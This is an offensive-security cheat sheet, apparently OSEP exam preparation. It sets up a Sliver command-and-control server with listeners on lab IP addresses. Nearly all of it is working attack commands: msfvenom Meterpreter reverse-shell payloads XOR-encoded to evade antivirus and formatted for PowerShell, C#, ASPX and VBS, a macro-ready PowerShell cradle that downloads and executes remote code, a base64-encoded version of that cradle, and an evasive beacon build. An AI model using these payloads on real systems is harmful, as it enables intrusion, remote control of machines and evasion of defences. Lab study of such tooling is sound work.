# Install suitable Binary for your OS - Linux in this instance
wget -q https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-server_linux
chmod +x ./sliver-server_linux
./sliver-server_linux

sliver > armory install all

? Install 21 aliases and 140 extensions? Yes
[*] Installing alias 'SharPersist' (v0.0.2) ... done!
... Complete output at the end ...

profiles new --http 10.10.10.11:8088 --format shellcode osep
stage-listener --url tcp://10.10.10.11:4443 --profile osep
http -L 10.10.10.11 --lport 8088

profiles new --http 10.10.10.11:9090 --format shellcode -a x86 osepx86
stage-listener --url tcp://10.10.10.11:5553 --profile osepx86
http -L 10.10.10.11 --lport 9090

profiles new --http 10.10.10.11:8099 --format service osep-lateral
http -L 10.10.10.11 --lport 8099

# Payloads
# 64 bit shell
sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4443 EXITFUNC=thread -f raw -o /home/kali/OSEP/hav0c/sliver.x64.bin


# PowerShell Payload
sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4443 EXITFUNC=thread -f raw | xxd -ps -c 1 | python3 -c 'import sys; key = 2; print("[Byte[]] $buf = " + ",".join([f"0x{(int(x, 16) ^ key):02X}" for x in sys.stdin.read().split()]))'


# C#
sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4443 EXITFUNC=thread -f raw | python3 -c 'key = 2; import sys; data = sys.stdin.buffer.read(); encrypted = bytes([b ^ key for b in data]); print(f"byte[] buf = new byte[{len(encrypted)}] {{ " + ", ".join([f"0x{b:02X}" for b in encrypted]) + " };")'


# ASPX Payloads
sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4443 EXITFUNC=thread -f raw | python3 -c 'key = 2; import sys; data = sys.stdin.buffer.read(); encrypted = bytes([b ^ key for b in data]); print(f"byte[] vL8fwOy_ = new byte[{len(encrypted)}] {{ " + ",".join([f"0x{b:02X}" for b in encrypted]) + " };")'


# VB - XOR
payload="cv2.docm"
python3 -c "payload=\"$payload\"; print(''.join(f'{ord(char) + 17:03}' for char in payload))"

payload="powershell -exec bypass -nop -w hidden -c iex((new-object system.net.webclient).downloadstring('http://10.10.10.11/hav0c-ps.txt'))"
python3 -c "payload=\"$payload\"; print(''.join(f'{ord(char) + 17:03}' for char in payload))"


# PowerShell Session
echo -en "(New-Object System.Net.WebClient).DownloadString('http://10.10.10.11/hav0c-ps.txt') | IEX" | iconv -t UTF-16LE | base64 -w 0
powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQAwAC4AMQAxAC8AaABhAHYAMABjAC0AcABzAC4AdAB4AHQAJwApACAAfAAgAEkARQBYAA==



# --
# 32 bit shell
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=5553 EXITFUNC=thread -f raw -o /home/kali/OSEP/hav0c/sliver.x86.bin


# VBS payload
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=5553 EXITFUNC=thread -f raw | xxd -ps -c 1 | python3 -c 'import sys; key = 2; data = [str(int(x, 16) ^ key) for x in sys.stdin.read().split()]; chunk_size = 50; chunks = [data[i:i + chunk_size] for i in range(0, len(data), chunk_size)]; print("buf = Array(", end=""); print(", _\n".join([", ".join(chunk) for chunk in chunks]) + ")")'


# PowerShell payload
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=5553 EXITFUNC=thread -f raw | xxd -ps -c 1 | python3 -c 'import sys; key = 2; print("[Byte[]] $buf = " + ",".join([f"0x{(int(x, 16) ^ key):02X}" for x in sys.stdin.read().split()]))'

# Create listener (if one doesn't exist already)
profiles new --http 10.10.10.11:8088 --format shellcode osep
http -L 10.10.10.11 --lport 8088


# Generate beacon .exe
generate beacon --http 10.10.250.10:8088 --name sliver.obfuscated --os windows --seconds 5 --jitter 0 --evasion